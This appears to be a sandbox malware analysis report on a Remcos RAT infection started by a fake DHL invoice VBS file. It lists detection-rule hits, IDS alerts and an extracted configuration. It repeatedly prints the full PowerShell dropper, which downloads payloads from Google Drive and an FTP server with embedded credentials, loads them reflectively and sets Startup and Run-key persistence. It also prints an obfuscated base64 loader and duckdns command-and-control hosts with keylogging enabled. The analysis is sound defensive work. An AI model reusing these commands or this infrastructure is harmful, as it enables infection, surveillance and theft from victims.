                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7340, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_zhs
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs", ProcessId: 5460, ProcessName: wscript.exe
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 
,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1928, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", ProcessId: 4852, ProcessName: cmd.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 
'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' +
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 
'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' +
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1928, TargetFilename: C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x11.ps1

                    Persistence and Installation Behavior

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-22T06:17:16.611141+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 188.114.96.3 | 443 | 192.168.2.4 | 49735 | TCP
                    2024-10-22T06:17:16.611141+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 188.114.96.3 | 443 | 192.168.2.4 | 49735 | TCP
                    2024-10-22T06:17:25.805214+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 43.226.229.232 | 57484 | TCP
                    2024-10-22T06:17:27.226086+0200 | 2032777 | 1 | Malware Command and Control Activity Detected | 43.226.229.232 | 57484 | 192.168.2.4 | 49745 | TCP
                    2024-10-22T06:19:42.831194+0200 | 2032777 | 1 | Malware Command and Control Activity Detected | 43.226.229.232 | 57484 | 192.168.2.4 | 49745 | TCP
                    2024-10-22T06:17:13.710351+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 188.114.96.3 | 443 | TCP
                    2024-10-22T06:17:21.239768+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | TCP
                    2024-10-22T06:17:29.198114+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 178.237.33.50 | 80 | TCP
                    2024-10-22T06:17:08.765856+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP
                    2024-10-22T06:17:13.710351+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 188.114.96.3 | 443 | TCP
                    2024-10-22T06:17:21.239768+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | TCP

                    AV Detection

                    Source: 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["iwarsut775laudrye001.duckdns.org:57484:0", "iwarsut775laudrye001.duckdns.org:57483:1", "iwarsut775laudrye3.duckdns.org:57484:0", "hjnourt38haoust1.duckdns.org:57484:0"], "Assigned name": "Cla$$", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-DDGG2A", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kanspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}
                    Source: desckvbrat.com.br Virustotal: Detection: 7%
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
